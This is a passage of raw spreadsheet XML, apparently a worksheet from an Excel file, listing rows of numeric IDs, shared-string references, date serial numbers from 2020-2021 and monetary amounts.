        <v>11981</v>
      </c>
      <c r="E2597">
        <v>14</v>
      </c>
      <c r="F2597" t="s">
        <v>9523</v>
      </c>
      <c r="G2597" s="1">
        <v>44097</v>
      </c>
      <c r="H2597">
        <v>5000</v>
      </c>
      <c r="J2597" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="2598" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2598">
        <v>22360</v>
      </c>
      <c r="B2598">
        <v>1048</v>
      </c>
      <c r="C2598" t="s">
        <v>3554</v>
      </c>
      <c r="D2598" t="s">
        <v>11981</v>
      </c>
      <c r="E2598">
        <v>14</v>
      </c>
      <c r="F2598" t="s">
        <v>11983</v>
      </c>
      <c r="G2598" s="1">
        <v>44097</v>
      </c>
      <c r="H2598">
        <v>5000</v>
      </c>
      <c r="J2598" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="2599" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2599">
        <v>22361</v>
      </c>
      <c r="B2599">
        <v>1399</v>
      </c>
      <c r="C2599" t="s">
        <v>3563</v>
      </c>
      <c r="D2599" t="s">
        <v>11984</v>
      </c>
      <c r="E2599">
        <v>4</v>
      </c>
      <c r="F2599" t="s">
        <v>9466</v>
      </c>
      <c r="G2599" s="1">
        <v>44095</v>
      </c>
      <c r="H2599">
        <v>212450</v>
      </c>
      <c r="I2599" t="s">
        <v>11985</v>
      </c>
      <c r="J2599" t="s">
        <v>10582</v>
      </c>
    </row>
    <row r="2600" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2600">
        <v>22362</v>
      </c>
      <c r="B2600">
        <v>1399</v>
      </c>
      <c r="C2600" t="s">
        <v>3563</v>
      </c>
      <c r="D2600" t="s">
        <v>11984</v>
      </c>
      <c r="E2600">
        <v>4</v>
      </c>
      <c r="F2600" t="s">
        <v>11986</v>
      </c>
      <c r="G2600" s="1">
        <v>44095</v>
      </c>
      <c r="H2600">
        <v>15000</v>
      </c>
      <c r="I2600" t="s">
        <v>11987</v>
      </c>
      <c r="J2600" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="2601" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2601">
        <v>22363</v>
      </c>
      <c r="B2601">
        <v>1399</v>
      </c>
      <c r="C2601" t="s">
        <v>3563</v>
      </c>
      <c r="D2601" t="s">
        <v>11984</v>
      </c>
      <c r="E2601">
        <v>4</v>
      </c>
      <c r="F2601" t="s">
        <v>11988</v>
      </c>
      <c r="G2601" s="1">
        <v>44095</v>
      </c>
      <c r="H2601">
        <v>10000</v>
      </c>
      <c r="I2601" t="s">
        <v>11017</v>
      </c>
      <c r="J2601" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="2602" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2602">
        <v>22364</v>
      </c>
      <c r="B2602">
        <v>1399</v>
      </c>
      <c r="C2602" t="s">
        <v>3563</v>
      </c>
      <c r="D2602" t="s">
        <v>11984</v>
      </c>
      <c r="E2602">
        <v>4</v>
      </c>
      <c r="F2602" t="s">
        <v>3814</v>
      </c>
      <c r="G2602" s="1">
        <v>44095</v>
      </c>
      <c r="H2602">
        <v>26000</v>
      </c>
      <c r="I2602" t="s">
        <v>9603</v>
      </c>
    </row>
    <row r="2603" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2603">
        <v>22365</v>
      </c>
      <c r="B2603">
        <v>1399</v>
      </c>
      <c r="C2603" t="s">
        <v>3563</v>
      </c>
      <c r="D2603" t="s">
        <v>11984</v>
      </c>
      <c r="E2603">
        <v>4</v>
      </c>
      <c r="F2603" t="s">
        <v>764</v>
      </c>
      <c r="G2603" s="1">
        <v>44095</v>
      </c>
      <c r="H2603">
        <v>15000</v>
      </c>
      <c r="I2603" t="s">
        <v>11989</v>
      </c>
    </row>
    <row r="2604" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2604">
        <v>22372</v>
      </c>
      <c r="B2604">
        <v>366</v>
      </c>
      <c r="C2604" t="s">
        <v>16439</v>
      </c>
      <c r="D2604" t="s">
        <v>16440</v>
      </c>
      <c r="E2604">
        <v>14</v>
      </c>
      <c r="F2604" t="s">
        <v>673</v>
      </c>
      <c r="G2604" s="1">
        <v>44202</v>
      </c>
      <c r="H2604" s="4">
        <v>86000</v>
      </c>
      <c r="I2604" t="s">
        <v>11991</v>
      </c>
      <c r="J2604" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="2605" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2605">
        <v>22373</v>
      </c>
      <c r="B2605">
        <v>366</v>
      </c>
      <c r="C2605" t="s">
        <v>1934</v>
      </c>
      <c r="D2605" t="s">
        <v>11990</v>
      </c>
      <c r="E2605">
        <v>14</v>
      </c>
      <c r="F2605" t="s">
        <v>10463</v>
      </c>
      <c r="G2605" s="1">
        <v>44202</v>
      </c>
      <c r="H2605">
        <v>19000</v>
      </c>
      <c r="I2605" t="s">
        <v>11992</v>
      </c>
      <c r="J2605" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="2606" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2606">
        <v>22374</v>
      </c>
      <c r="B2606">
        <v>366</v>
      </c>
      <c r="C2606" t="s">
        <v>1934</v>
      </c>
      <c r="D2606" t="s">
        <v>11990</v>
      </c>
      <c r="E2606">
        <v>14</v>
      </c>
      <c r="F2606" t="s">
        <v>11993</v>
      </c>
      <c r="G2606" s="1">
        <v>44202</v>
      </c>
      <c r="H2606">
        <v>0</v>
      </c>
    </row>
    <row r="2607" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2607">
        <v>22375</v>
      </c>
      <c r="B2607">
        <v>4879</v>
      </c>
      <c r="C2607" t="s">
        <v>16441</v>
      </c>
      <c r="D2607" t="s">
        <v>16442</v>
      </c>
      <c r="E2607">
        <v>13</v>
      </c>
      <c r="F2607" t="s">
        <v>11994</v>
      </c>
      <c r="G2607" s="1">
        <v>44126</v>
      </c>
      <c r="H2607" s="4">
        <v>1700000</v>
      </c>
      <c r="I2607" t="s">
        <v>11995</v>
      </c>
    </row>
    <row r="2608" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2608">
        <v>22377</v>
      </c>
      <c r="B2608">
        <v>366</v>
      </c>
      <c r="C2608" t="s">
        <v>1934</v>
      </c>
      <c r="D2608" t="s">
        <v>11990</v>
      </c>
      <c r="E2608">
        <v>14</v>
      </c>
      <c r="F2608" t="s">
        <v>11996</v>
      </c>
      <c r="G2608" s="1">
        <v>44202</v>
      </c>
      <c r="H2608">
        <v>0</v>
      </c>
      <c r="I2608" t="s">
        <v>9984</v>
      </c>
      <c r="J2608" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="2609" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2609">
        <v>22378</v>
      </c>
      <c r="B2609">
        <v>366</v>
      </c>
      <c r="C2609" t="s">
        <v>1934</v>
      </c>
      <c r="D2609" t="s">
        <v>11990</v>
      </c>
      <c r="E2609">
        <v>14</v>
      </c>
      <c r="F2609" t="s">
        <v>9441</v>
      </c>
      <c r="G2609" s="1">
        <v>44202</v>
      </c>
      <c r="H2609">
        <v>88000</v>
      </c>
      <c r="I2609" t="s">
        <v>11997</v>
      </c>
      <c r="J2609" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="2610" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2610">
        <v>22379</v>
      </c>
      <c r="B2610">
        <v>4954</v>
      </c>
      <c r="C2610" t="s">
        <v>7666</v>
      </c>
      <c r="D2610" t="s">
        <v>11998</v>
      </c>
      <c r="E2610">
        <v>7</v>
      </c>
      <c r="F2610" t="s">
        <v>11999</v>
      </c>
      <c r="G2610" s="1">
        <v>44104</v>
      </c>
      <c r="H2610">
        <v>100000</v>
      </c>
      <c r="I2610" t="s">
        <v>12000</v>
      </c>
      <c r="J2610" t="s">
        <v>9624</v>
      </c>
    </row>
    <row r="2611" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2611">
        <v>22380</v>
      </c>
      <c r="B2611">
        <v>4969</v>
      </c>
      <c r="C2611" t="s">
        <v>7659</v>
      </c>
      <c r="D2611" t="s">
        <v>12001</v>
      </c>
      <c r="E2611">
        <v>26</v>
      </c>
      <c r="F2611" t="s">
        <v>4686</v>
      </c>
      <c r="G2611" s="1">
        <v>44099</v>
      </c>
      <c r="H2611">
        <v>30000</v>
      </c>
      <c r="J2611" t="s">
        <v>12002</v>
      </c>
    </row>
    <row r="2612" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2612">
        <v>22381</v>
      </c>
      <c r="B2612">
        <v>792</v>
      </c>
      <c r="C2612" t="s">
        <v>1944</v>
      </c>
      <c r="D2612" t="s">
        <v>12003</v>
      </c>
      <c r="E2612">
        <v>16</v>
      </c>
      <c r="F2612" t="s">
        <v>12004</v>
      </c>
      <c r="G2612" s="1">
        <v>44166</v>
      </c>
      <c r="H2612">
        <v>24000</v>
      </c>
      <c r="J2612" t="s">
        <v>12005</v>
      </c>
    </row>
    <row r="2613" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2613">
        <v>22382</v>
      </c>
      <c r="B2613">
        <v>1951</v>
      </c>
      <c r="C2613" t="s">
        <v>6166</v>
      </c>
      <c r="D2613" t="s">
        <v>11694</v>
      </c>
      <c r="E2613">
        <v>31</v>
      </c>
      <c r="F2613" t="s">
        <v>12006</v>
      </c>
      <c r="G2613" s="1">
        <v>44098</v>
      </c>
      <c r="H2613">
        <v>10000</v>
      </c>
      <c r="I2613" t="s">
        <v>10010</v>
      </c>
    </row>
    <row r="2614" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2614">
        <v>22384</v>
      </c>
      <c r="B2614">
        <v>1865</v>
      </c>
      <c r="C2614" t="s">
        <v>6268</v>
      </c>
      <c r="D2614" t="s">
        <v>12007</v>
      </c>
      <c r="E2614">
        <v>19</v>
      </c>
      <c r="F2614" t="s">
        <v>7241</v>
      </c>
      <c r="G2614" s="1">
        <v>44200</v>
      </c>
      <c r="H2614">
        <v>30</v>
      </c>
      <c r="I2614" t="s">
        <v>12008</v>
      </c>
      <c r="J2614" t="s">
        <v>12009</v>
      </c>
    </row>
    <row r="2615" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2615">
        <v>22385</v>
      </c>
      <c r="B2615">
        <v>1865</v>
      </c>
      <c r="C2615" t="s">
        <v>6268</v>
      </c>
      <c r="D2615" t="s">
        <v>12007</v>
      </c>
      <c r="E2615">
        <v>19</v>
      </c>
      <c r="F2615" t="s">
        <v>12010</v>
      </c>
      <c r="G2615" s="1">
        <v>44200</v>
      </c>
      <c r="H2615">
        <v>30</v>
      </c>
      <c r="I2615" t="s">
        <v>12008</v>
      </c>
      <c r="J2615" t="s">
        <v>12009</v>
      </c>
    </row>
    <row r="2616" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2616">
        <v>22386</v>
      </c>
      <c r="B2616">
        <v>1865</v>
      </c>
      <c r="C2616" t="s">
        <v>6268</v>
      </c>
      <c r="D2616" t="s">
        <v>12007</v>
      </c>
      <c r="E2616">
        <v>19</v>
      </c>
      <c r="F2616" t="s">
        <v>9590</v>
      </c>
      <c r="G2616" s="1">
        <v>44200</v>
      </c>
      <c r="H2616">
        <v>30</v>
      </c>
      <c r="I2616" t="s">
        <v>12008</v>
      </c>
      <c r="J2616" t="s">
        <v>12009</v>
      </c>
    </row>
    <row r="2617" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2617">
        <v>22387</v>
      </c>
      <c r="B2617">
        <v>1257</v>
      </c>
      <c r="C2617" t="s">
        <v>2547</v>
      </c>
      <c r="D2617" t="s">
        <v>12011</v>
      </c>
      <c r="E2617">
        <v>16</v>
      </c>
      <c r="F2617" t="s">
        <v>9458</v>
      </c>
      <c r="G2617" s="1">
        <v>44098</v>
      </c>
      <c r="H2617">
        <v>6000</v>
      </c>
      <c r="J2617" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="2618" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2618">
        <v>22389</v>
      </c>
      <c r="B2618">
        <v>1257</v>
      </c>
      <c r="C2618" t="s">
        <v>2547</v>
      </c>
      <c r="D2618" t="s">
        <v>12011</v>
      </c>
      <c r="E2618">
        <v>16</v>
      </c>
      <c r="F2618" t="s">
        <v>9459</v>
      </c>
      <c r="G2618" s="1">
        <v>44098</v>
      </c>
      <c r="H2618">
        <v>12000</v>
      </c>
      <c r="J2618" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="2619" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2619">
        <v>22390</v>
      </c>
      <c r="B2619">
        <v>1257</v>
      </c>
      <c r="C2619" t="s">
        <v>2547</v>
      </c>
      <c r="D2619" t="s">
        <v>12011</v>
      </c>
      <c r="E2619">
        <v>16</v>
      </c>
      <c r="F2619" t="s">
        <v>5224</v>
      </c>
      <c r="G2619" s="1">
        <v>44098</v>
      </c>
      <c r="H2619">
        <v>3000</v>
      </c>
      <c r="J2619" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="2620" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2620">
        <v>22391</v>
      </c>
      <c r="B2620">
        <v>4858</v>
      </c>
      <c r="C2620" t="s">
        <v>7680</v>
      </c>
      <c r="D2620" t="s">
        <v>12012</v>
      </c>
      <c r="E2620">
        <v>13</v>
      </c>
      <c r="F2620" t="s">
        <v>12013</v>
      </c>
      <c r="G2620" s="1">
        <v>44126</v>
      </c>
      <c r="H2620">
        <v>3000000</v>
      </c>
      <c r="I2620" t="s">
        <v>12014</v>
      </c>
    </row>
    <row r="2621" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2621">
        <v>22392</v>
      </c>
      <c r="B2621">
        <v>4858</v>
      </c>
      <c r="C2621" t="s">
        <v>7680</v>
      </c>
      <c r="D2621" t="s">
        <v>12012</v>
      </c>
      <c r="E2621">
        <v>13</v>
      </c>
      <c r="F2621" t="s">
        <v>12015</v>
      </c>
      <c r="G2621" s="1">
        <v>44126</v>
      </c>
      <c r="H2621">
        <v>3000000</v>
      </c>
      <c r="I2621" t="s">
        <v>12014</v>
      </c>
    </row>
    <row r="2622" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2622">
        <v>22393</v>
      </c>
      <c r="B2622">
        <v>4858</v>
      </c>
      <c r="C2622" t="s">
        <v>7680</v>
      </c>
      <c r="D2622" t="s">
        <v>12012</v>
      </c>
      <c r="E2622">
        <v>13</v>
      </c>
      <c r="F2622" t="s">
        <v>9438</v>
      </c>
      <c r="G2622" s="1">
        <v>44126</v>
      </c>
      <c r="H2622">
        <v>3000000</v>
      </c>
      <c r="I2622" t="s">
        <v>12014</v>
      </c>
    </row>
    <row r="2623" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2623">
        <v>22394</v>
      </c>
      <c r="B2623">
        <v>4858</v>
      </c>
      <c r="C2623" t="s">
        <v>7680</v>
      </c>
      <c r="D2623" t="s">
        <v>12012</v>
      </c>
      <c r="E2623">
        <v>13</v>
      </c>
      <c r="F2623" t="s">
        <v>2924</v>
      </c>
      <c r="G2623" s="1">
        <v>44126</v>
      </c>
      <c r="H2623">
        <v>3000000</v>
      </c>
      <c r="I2623" t="s">
        <v>12014</v>
      </c>
    </row>
    <row r="2624" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2624">
        <v>22395</v>
      </c>
      <c r="B2624">
        <v>4858</v>
      </c>
      <c r="C2624" t="s">
        <v>7680</v>
      </c>
      <c r="D2624" t="s">
        <v>12012</v>
      </c>
      <c r="E2624">
        <v>13</v>
      </c>
      <c r="F2624" t="s">
        <v>11027</v>
      </c>
      <c r="G2624" s="1">
        <v>44126</v>
      </c>
      <c r="H2624">
        <v>3000000</v>
      </c>
      <c r="I2624" t="s">
        <v>12014</v>
      </c>
    </row>
    <row r="2625" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2625">
        <v>22396</v>
      </c>
      <c r="B2625">
        <v>4858</v>
      </c>
      <c r="C2625" t="s">
        <v>7680</v>
      </c>
      <c r="D2625" t="s">
        <v>12012</v>
      </c>
      <c r="E2625">
        <v>13</v>
      </c>
      <c r="F2625" t="s">
        <v>12016</v>
      </c>
      <c r="G2625" s="1">
        <v>44126</v>
      </c>
      <c r="H2625">
        <v>3000000</v>
      </c>
      <c r="I2625" t="s">
        <v>12014</v>
      </c>
    </row>
    <row r="2626" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2626">
        <v>22397</v>
      </c>
      <c r="B2626">
        <v>4858</v>
      </c>
      <c r="C2626" t="s">
        <v>7680</v>
      </c>
      <c r="D2626" t="s">
        <v>12012</v>
      </c>
      <c r="E2626">
        <v>13</v>
      </c>
      <c r="F2626" t="s">
        <v>12017</v>
      </c>
      <c r="G2626" s="1">
        <v>44126</v>
      </c>
      <c r="H2626">
        <v>3000000</v>
      </c>
      <c r="I2626" t="s">
        <v>12014</v>
      </c>
    </row>
    <row r="2627" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2627">
        <v>22398</v>
      </c>
      <c r="B2627">
        <v>4858</v>
      </c>
      <c r="C2627" t="s">
        <v>7680</v>
      </c>
      <c r="D2627" t="s">
        <v>12012</v>
      </c>
      <c r="E2627">
        <v>13</v>
      </c>
      <c r="F2627" t="s">
        <v>3076</v>
      </c>
      <c r="G2627" s="1">
        <v>44126</v>
      </c>
      <c r="H2627">
        <v>3000000</v>
      </c>
      <c r="I2627" t="s">
        <v>12014</v>
      </c>
    </row>
    <row r="2628" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2628">
        <v>22399</v>
      </c>
      <c r="B2628">
        <v>1304</v>
      </c>
      <c r="C2628" t="s">
        <v>2643</v>
      </c>
      <c r="D2628" t="s">
        <v>12018</v>
      </c>
      <c r="E2628">
        <v>17</v>
      </c>
      <c r="F2628" t="s">
        <v>9561</v>
      </c>
      <c r="G2628" s="1">
        <v>44104</v>
      </c>
      <c r="H2628">
        <v>450000</v>
      </c>
      <c r="J2628" t="s">
        <v>12019</v>
      </c>
    </row>
    <row r="2629" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2629">
        <v>22400</v>
      </c>
      <c r="B2629">
        <v>1304</v>
      </c>
      <c r="C2629" t="s">
        <v>2643</v>
      </c>
      <c r="D2629" t="s">
        <v>12018</v>
      </c>
      <c r="E2629">
        <v>17</v>
      </c>
      <c r="F2629" t="s">
        <v>12020</v>
      </c>
      <c r="G2629" s="1">
        <v>44104</v>
      </c>
      <c r="H2629">
        <v>170000</v>
      </c>
      <c r="I2629" t="s">
        <v>9693</v>
      </c>
      <c r="J2629" t="s">
        <v>12019</v>
      </c>
    </row>
    <row r="2630" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2630">
        <v>22401</v>
      </c>
      <c r="B2630">
        <v>1304</v>
      </c>
      <c r="C2630" t="s">
        <v>2643</v>
      </c>
      <c r="D2630" t="s">
        <v>12018</v>
      </c>
      <c r="E2630">
        <v>17</v>
      </c>
      <c r="F2630" t="s">
        <v>12021</v>
      </c>
      <c r="G2630" s="1">
        <v>44104</v>
      </c>
      <c r="H2630">
        <v>180000</v>
      </c>
      <c r="I2630" t="s">
        <v>9693</v>
      </c>
      <c r="J2630" t="s">
        <v>12019</v>
      </c>
    </row>
    <row r="2631" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2631">
        <v>22402</v>
      </c>
      <c r="B2631">
        <v>1304</v>
      </c>
      <c r="C2631" t="s">
        <v>2643</v>
      </c>
      <c r="D2631" t="s">
        <v>12018</v>
      </c>
      <c r="E2631">
        <v>17</v>
      </c>
      <c r="F2631" t="s">
        <v>2236</v>
      </c>
      <c r="G2631" s="1">
        <v>44104</v>
      </c>
      <c r="H2631">
        <v>160000</v>
      </c>
      <c r="I2631" t="s">
        <v>9693</v>
      </c>
      <c r="J2631" t="s">
        <v>12019</v>
      </c>
    </row>
    <row r="2632" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2632">
        <v>22403</v>
      </c>
      <c r="B2632">
        <v>1821</v>
      </c>
      <c r="C2632" t="s">
        <v>6274</v>
      </c>
      <c r="D2632" t="s">
        <v>12022</v>
      </c>
      <c r="E2632">
        <v>14</v>
      </c>
      <c r="F2632" t="s">
        <v>9532</v>
      </c>
      <c r="G2632" s="1">
        <v>44337</v>
      </c>
      <c r="H2632">
        <v>96000</v>
      </c>
      <c r="J2632" t="s">
        <v>9551</v>
      </c>
    </row>
    <row r="2633" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2633">
        <v>22404</v>
      </c>
      <c r="B2633">
        <v>896</v>
      </c>
      <c r="C2633" t="s">
        <v>3429</v>
      </c>
      <c r="D2633" t="s">
        <v>12023</v>
      </c>
      <c r="E2633">
        <v>14</v>
      </c>
      <c r="F2633" t="s">
        <v>9472</v>
      </c>
      <c r="G2633" s="1">
        <v>44176</v>
      </c>
      <c r="H2633">
        <v>10000</v>
      </c>
      <c r="I2633" t="s">
        <v>9485</v>
      </c>
      <c r="J2633" t="s">
        <v>10630</v>
      </c>
    </row>
    <row r="2634" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2634">
        <v>22405</v>
      </c>
      <c r="B2634">
        <v>896</v>
      </c>
      <c r="C2634" t="s">
        <v>3429</v>
      </c>
      <c r="D2634" t="s">
        <v>12023</v>
      </c>
      <c r="E2634">
        <v>14</v>
      </c>
      <c r="F2634" t="s">
        <v>12024</v>
      </c>
      <c r="G2634" s="1">
        <v>44176</v>
      </c>
      <c r="H2634">
        <v>5000</v>
      </c>
      <c r="I2634" t="s">
        <v>10010</v>
      </c>
    </row>
    <row r="2635" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2635">
        <v>22406</v>
      </c>
      <c r="B2635">
        <v>1405</v>
      </c>
      <c r="C2635" t="s">
        <v>16443</v>
      </c>
      <c r="D2635" t="s">
        <v>16444</v>
      </c>
      <c r="E2635">
        <v>16</v>
      </c>
      <c r="F2635" t="s">
        <v>12025</v>
      </c>
      <c r="G2635" s="1">
        <v>44176</v>
      </c>
      <c r="H2635" s="4">
        <v>100000</v>
      </c>
      <c r="J2635" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="2636" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2636">
        <v>22407</v>
      </c>
      <c r="B2636">
        <v>1405</v>
      </c>
      <c r="C2636" t="s">
        <v>16443</v>
      </c>
      <c r="D2636" t="s">
        <v>16444</v>
      </c>
      <c r="E2636">
        <v>16</v>
      </c>
      <c r="F2636" t="s">
        <v>12026</v>
      </c>
      <c r="G2636" s="1">
        <v>44176</v>
      </c>
      <c r="H2636" s="4">
        <v>300000</v>
      </c>
      <c r="J2636" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="2637" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2637">
        <v>22408</v>
      </c>
      <c r="B2637">
        <v>1405</v>
      </c>
      <c r="C2637" t="s">
        <v>2744</v>
      </c>
      <c r="D2637" t="s">
        <v>10168</v>
      </c>
      <c r="E2637">
        <v>16</v>
      </c>
      <c r="F2637" t="s">
        <v>9437</v>
      </c>
      <c r="G2637" s="1">
        <v>44176</v>
      </c>
      <c r="H2637">
        <v>1000</v>
      </c>
      <c r="J2637" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="2638" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2638">
        <v>22411</v>
      </c>
      <c r="B2638">
        <v>29</v>
      </c>
      <c r="C2638" t="s">
        <v>1899</v>
      </c>
      <c r="D2638" t="s">
        <v>11952</v>
      </c>
      <c r="E2638">
        <v>17</v>
      </c>
      <c r="F2638" t="s">
        <v>5434</v>
      </c>
      <c r="G2638" s="1">
        <v>44110</v>
      </c>
      <c r="H2638">
        <v>500</v>
      </c>
      <c r="J2638" t="s">
        <v>9553</v>
      </c>
    </row>
    <row r="2639" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2639">
        <v>22412</v>
      </c>
      <c r="B2639">
        <v>1408</v>
      </c>
      <c r="C2639" t="s">
        <v>2796</v>
      </c>
      <c r="D2639" t="s">
        <v>12027</v>
      </c>
      <c r="E2639">
        <v>11</v>
      </c>
      <c r="F2639" t="s">
        <v>9617</v>
      </c>
      <c r="G2639" s="1">
        <v>44124</v>
      </c>
      <c r="H2639">
        <v>40000</v>
      </c>
      <c r="I2639" t="s">
        <v>11301</v>
      </c>
    </row>
    <row r="2640" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2640">
        <v>22413</v>
      </c>
      <c r="B2640">
        <v>2577</v>
      </c>
      <c r="C2640" t="s">
        <v>5230</v>
      </c>
      <c r="D2640" t="s">
        <v>10169</v>
      </c>
      <c r="E2640">
        <v>12</v>
      </c>
      <c r="F2640" t="s">
        <v>9925</v>
      </c>
      <c r="G2640" s="1">
        <v>44097</v>
      </c>
      <c r="H2640">
        <v>250000</v>
      </c>
      <c r="I2640" t="s">
        <v>12028</v>
      </c>
    </row>
    <row r="2641" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2641">
        <v>22414</v>
      </c>
      <c r="B2641">
        <v>4982</v>
      </c>
      <c r="C2641" t="s">
        <v>7688</v>
      </c>
      <c r="D2641" t="s">
        <v>12029</v>
      </c>
      <c r="E2641">
        <v>29</v>
      </c>
      <c r="F2641" t="s">
        <v>4686</v>
      </c>
      <c r="G2641" s="1">
        <v>44113</v>
      </c>
      <c r="H2641">
        <v>1000</v>
      </c>
      <c r="J2641" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="2642" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2642">
        <v>22415</v>
      </c>
      <c r="B2642">
        <v>2035</v>
      </c>
      <c r="C2642" t="s">
        <v>6280</v>
      </c>
      <c r="D2642" t="s">
        <v>12030</v>
      </c>
      <c r="E2642">
        <v>29</v>
      </c>
      <c r="F2642" t="s">
        <v>2236</v>
      </c>
      <c r="G2642" s="1">
        <v>44159</v>
      </c>
      <c r="H2642">
        <v>1000</v>
      </c>
      <c r="I2642" t="s">
        <v>9965</v>
      </c>
      <c r="J2642" t="s">
        <v>11937</v>
      </c>
    </row>
    <row r="2643" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2643">
        <v>22416</v>
      </c>
      <c r="B2643">
        <v>2035</v>
      </c>
      <c r="C2643" t="s">
        <v>6280</v>
      </c>
      <c r="D2643" t="s">
        <v>12030</v>
      </c>
      <c r="E2643">
        <v>29</v>
      </c>
      <c r="F2643" t="s">
        <v>4686</v>
      </c>
      <c r="G2643" s="1">
        <v>44159</v>
      </c>
      <c r="H2643">
        <v>1000</v>
      </c>
      <c r="J2643" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="2644" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2644">
        <v>22417</v>
      </c>
      <c r="B2644">
        <v>2035</v>
      </c>
      <c r="C2644" t="s">
        <v>6280</v>
      </c>
      <c r="D2644" t="s">
        <v>12030</v>
      </c>
      <c r="E2644">
        <v>29</v>
      </c>
      <c r="F2644" t="s">
        <v>12031</v>
      </c>
      <c r="G2644" s="1">
        <v>44159</v>
      </c>
      <c r="H2644">
        <v>1000</v>
      </c>
      <c r="J2644" t="s">
        <v>9624</v>
      </c>
    </row>
    <row r="2645" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2645">
        <v>22418</v>
      </c>
      <c r="B2645">
        <v>2035</v>
      </c>
      <c r="C2645" t="s">
        <v>6280</v>
      </c>
      <c r="D2645" t="s">
        <v>12030</v>
      </c>
      <c r="E2645">
        <v>29</v>
      </c>
      <c r="F2645" t="s">
        <v>9610</v>
      </c>
      <c r="G2645" s="1">
        <v>44159</v>
      </c>
      <c r="H2645">
        <v>500</v>
      </c>
      <c r="J2645" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="2646" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2646">
        <v>22419</v>
      </c>
      <c r="B2646">
        <v>2035</v>
      </c>
      <c r="C2646" t="s">
        <v>6280</v>
      </c>
      <c r="D2646" t="s">
        <v>12030</v>
      </c>
      <c r="E2646">
        <v>29</v>
      </c>
      <c r="F2646" t="s">
        <v>5434</v>
      </c>
      <c r="G2646" s="1">
        <v>44159</v>
      </c>
      <c r="H2646">
        <v>500</v>
      </c>
      <c r="J2646" t="s">
        <v>11937</v>
      </c>
    </row>
    <row r="2647" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2647">
        <v>22420</v>
      </c>
      <c r="B2647">
        <v>2035</v>
      </c>
      <c r="C2647" t="s">
        <v>6280</v>
      </c>
      <c r="D2647" t="s">
        <v>12030</v>
      </c>
      <c r="E2647">
        <v>29</v>
      </c>
      <c r="F2647" t="s">
        <v>9217</v>
      </c>
      <c r="G2647" s="1">
        <v>44159</v>
      </c>
      <c r="H2647">
        <v>500</v>
      </c>
      <c r="J2647" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="2648" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2648">
        <v>22421</v>
      </c>
      <c r="B2648">
        <v>2035</v>
      </c>
      <c r="C2648" t="s">
        <v>6280</v>
      </c>
      <c r="D2648" t="s">
        <v>12030</v>
      </c>
      <c r="E2648">
        <v>29</v>
      </c>
      <c r="F2648" t="s">
        <v>3204</v>
      </c>
      <c r="G2648" s="1">
        <v>44159</v>
      </c>
      <c r="H2648">
        <v>500</v>
      </c>
      <c r="J2648" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="2649" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2649">
        <v>22422</v>
      </c>
      <c r="B2649">
        <v>1129</v>
      </c>
      <c r="C2649" t="s">
        <v>3519</v>
      </c>
      <c r="D2649" t="s">
